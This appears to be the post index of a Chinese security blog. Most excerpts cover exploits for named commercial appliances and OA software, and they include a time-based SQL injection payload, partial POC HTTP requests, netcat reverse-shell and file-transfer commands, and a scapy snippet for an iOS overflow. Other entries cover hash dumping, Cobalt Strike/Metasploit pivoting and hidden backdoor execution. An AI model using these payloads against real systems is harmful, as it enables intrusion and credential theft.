r1ch4rd_L - 博客园

2020年9月11日

摘要： POST /Proxy HTTP/1.1 Accept: Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host Co 阅读全文

posted @ 2020-09-11 17:27 r1ch4rd_L 阅读(2587) 评论(0) 推荐(0) 编辑

天融信Top-app LB负载均衡SQL注入0day

摘要： POST /acc/clsf/report/datasource.php HTTP/1.1 Host: Connection: close Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-V 阅读全文

posted @ 2020-09-11 11:14 r1ch4rd_L 阅读(633) 评论(0) 推荐(0) 编辑

绿盟UTS综合威胁探针管理员任意登录

摘要：绿盟UTS综合威胁探针管理员任意登录漏洞详情：绿盟全流量威胁分析解决方案针对原始流量进行采集和监控，对流量信息进行深度还原、存储、查询和分析，可以及时掌握重要信息系统相关网络安全威胁风险，及时检测漏洞、病毒木马、网络攻击情况，及时发现网络安全事件线索，及时通报预警重大网络安全威胁，调查、防范和打阅读全文

posted @ 2020-09-11 11:11 r1ch4rd_L 阅读(1777) 评论(0) 推荐(0) 编辑

深信服EDR3.2.21任意代码执行

摘要：漏洞原理: dev_linkage_launch.php 为设备联动的新入口点主要是将联动的接口构造成业务统一处理的接口主要调用跟进可以看到第一个检查为 $req_url = $_SERVER['PHP_SELF']; 绕过第一个检查: 在他们系统nginx配置文件里面: 通过nginx规则阅读全文

posted @ 2020-09-11 10:58 r1ch4rd_L 阅读(2959) 评论(0) 推荐(0) 编辑

2020年9月1日

linux反弹shell总结

摘要： 1.1发送文件(公网发内网) 文件发送端： nc -lp 6666 < 文件文件接收端： nc 发送端ip 发送端端口 > 新文件 1.2发送文件(内网发公网)文件发送端： nc -lp 6666 > 文件文件接收端： nc 发送端ip 发送端端口 < 新文件 2.聊天发送端： nc -lp 6 阅读全文

posted @ 2020-09-01 11:32 r1ch4rd_L 阅读(790) 评论(1) 推荐(0) 编辑

2020年8月31日

mysql在8.0版本下修改密码的命令

摘要： ubuntu20.04上边部署了一个新的mysql服务，默认没密码，想要修改密码。使用如下手段第一种：ALTER USER 'root'@'localhost' IDENTIFIED BY '密码'; 第二种： update user set authentication_string=pass 阅读全文

posted @ 2020-08-31 09:30 r1ch4rd_L 阅读(3534) 评论(0) 推荐(1) 编辑

2020年8月28日

Linux提权常用漏洞速查表

摘要：漏洞列表 #CVE #Description #Kernels CVE–2018–18955 [map_write() in kernel/user_namespace.c allows privilege escalation](Linux kernel 4.15.x through 4.19.x 阅读全文

posted @ 2020-08-28 13:49 r1ch4rd_L 阅读(1341) 评论(1) 推荐(1) 编辑

windows提权常用系统漏洞与补丁编号速查对照表

摘要： #Security Bulletin #KB #Description #Operating System CVE-2020-0787 [Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerabil 阅读全文

posted @ 2020-08-28 09:34 r1ch4rd_L 阅读(3201) 评论(0) 推荐(0) 编辑

2020年8月25日

通达OA<=11.5版本SQL注入——附件上传

摘要： SQL注入 POC(11.5版本无需登录) 漏洞参数：SORT_ID，FILE_SORT 审计版本：通达OA 11.5 POST /general/file_folder/swfupload_new.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 1 阅读全文

posted @ 2020-08-25 10:14 r1ch4rd_L 阅读(574) 评论(0) 推荐(0) 编辑

通达OA<=11.5版本SQL注入——日程安排

摘要：注入点产生位置注入payload 1593360000' AND if((1<0),SLEEP(0),sleep(2)) and '1 不产生延迟产生延迟阅读全文

posted @ 2020-08-25 10:13 r1ch4rd_L 阅读(184) 评论(0) 推荐(0) 编辑

希尔伯特曲线python3实现

摘要：需要OpenGL库：https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyopengl #coding:utf-8 from OpenGL.GL import * from OpenGL.GLUT import * class fractal(object): 阅读全文

posted @ 2020-08-25 08:41 r1ch4rd_L 阅读(1057) 评论(0) 推荐(0) 编辑

2020年8月24日

深信服edr控制中心漏洞——验证码逻辑错误

摘要：验证码逻辑错误文件：tool/log/l.php的第93行阅读全文

posted @ 2020-08-24 17:40 r1ch4rd_L 阅读(317) 评论(0) 推荐(0) 编辑

深信服edr控制中心漏洞——任意文件读取

摘要：任意文件读取文件：store/cat.php第413行 read_file函数定义在该文件272行阅读全文

posted @ 2020-08-24 17:39 r1ch4rd_L 阅读(1004) 评论(0) 推荐(0) 编辑

深信服edr控制中心漏洞——代码执行

摘要：第一处代码执行文件：tool/php_cli.php第64行第二处代码执行文件：tool/mdd_sql.php第133行第三处代码执行文件：tool/log/c.php 理论上四个变量都可导致代码执行阅读全文

posted @ 2020-08-24 17:37 r1ch4rd_L 阅读(1214) 评论(0) 推荐(0) 编辑

2020年8月4日

windows下hash抓取的几种方式

摘要：前提：在渗透测试过程中，对于windows系统的机器渗透需要注意hash的获取，其中hash分为LM-HASH与NTLM-HASH，在windows系统中，hash的默认存储位置为： C:\Windows\System32\config\SAM 各种工具： mimikatz privilege::d 阅读全文

posted @ 2020-08-04 14:33 r1ch4rd_L 阅读(1215) 评论(0) 推荐(0) 编辑

msf+cobaltstrike联动(二)：把cs中的机器spwan给msf

摘要：前提：CS已经获取到session，可以进入图形化管理机器，现在需要使用msf进行进一步渗透，需要msf的metepreter。开启msf msf设置监听 msf > use exploit/multi/handler msf exploit(handler) > set payload wind 阅读全文

posted @ 2020-08-04 14:30 r1ch4rd_L 阅读(764) 评论(0) 推荐(0) 编辑

msf+cobaltstrike联动(一)：把msf的session发给cobaltstrike

摘要：前提：MFS已经获取到session，可以进入metepreter，现在需要使用cobaltstrike进行图形化管理或团队协作。 cobaltstrike起一个beacon监听，如使用：windows/beacon_http/reverse_http 设置好host和port之后启动监听。 MSF 阅读全文

posted @ 2020-08-04 14:25 r1ch4rd_L 阅读(942) 评论(0) 推荐(0) 编辑

CS代理+proxychains+nmap进行内网扫描

摘要：前提：拿下边界机之后，进入内网，想用nmap怎么办？ CS可以开启代理，但是是socks4的代理，只能使用tcp协议，所以nmap使用的时候要使用-sT选择使用tcp_协议，要使用-Pn不使用ICMP_的ping确认主机存活阅读全文

posted @ 2020-08-04 14:20 r1ch4rd_L 阅读(3541) 评论(0) 推荐(1) 编辑

利用powershell隐藏执行后门

摘要：运行后门时，有些后门不能中断。双击运行这种后门会产生一个黑框。一条命令就能使其在后台执行命令解释： start-process启动一个进程 -windowstyle窗口样式 hidden隐藏阅读全文

posted @ 2020-08-04 14:17 r1ch4rd_L 阅读(776) 评论(0) 推荐(0) 编辑

内网渗透

摘要： 1.信息收集 1.1.windows 1.1.1用户操作 query user #查看当前在线的用户 whoami #查看当前用户 net user #查看当前系统的用户 net1 user #查看当前系统的用户 net user /domain #查看当前域里面的用户 net user admin 阅读全文

posted @ 2020-08-04 14:15 r1ch4rd_L 阅读(622) 评论(0) 推荐(0) 编辑

brew更换国内源

摘要：来源：清华大学开源软件镜像站(https://mirror.tuna.tsinghua.edu.cn/help/homebrew/) 替换现有上游 1 # brew 程序本身，Homebrew/Linuxbrew 相同 2 git -C "$(brew --repo)" remote set-url 阅读全文

posted @ 2020-08-04 10:01 r1ch4rd_L 阅读(3694) 评论(0) 推荐(0) 编辑

2019年3月9日

CVE-2018-4407(IOS缓冲区溢出漏洞)exp

摘要： CVE-2018-4407为ios缓冲区溢出漏洞 exp： import scapyfrom scapy.all import * send(IP(dst="同一局域网内目标Ip",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1" 阅读全文

posted @ 2019-03-09 19:35 r1ch4rd_L 阅读(570) 评论(0) 推荐(0) 编辑

2018年11月3日

一个简书的爬虫，可以设定页码，抓取文章标题、简介以及链接

摘要：环境：python3 模块：requests、bs4 阅读全文

posted @ 2018-11-03 10:08 r1ch4rd_L 阅读(541) 评论(0) 推荐(0) 编辑

2016年11月13日

kali linux下的arp攻击

摘要：这是我第一篇博客，写的不好请谅解 ____________________________（分割线）_______________________________ 在kali linux系统下自带工具中有个arp神器叫做“arpspoof”，废话不多说，直接上手此次实验环境为靶机与FTP服务器之间阅读全文

posted @ 2016-11-13 17:30 r1ch4rd_L 阅读(7172) 评论(1) 推荐(0) 编辑

逗比大师

公告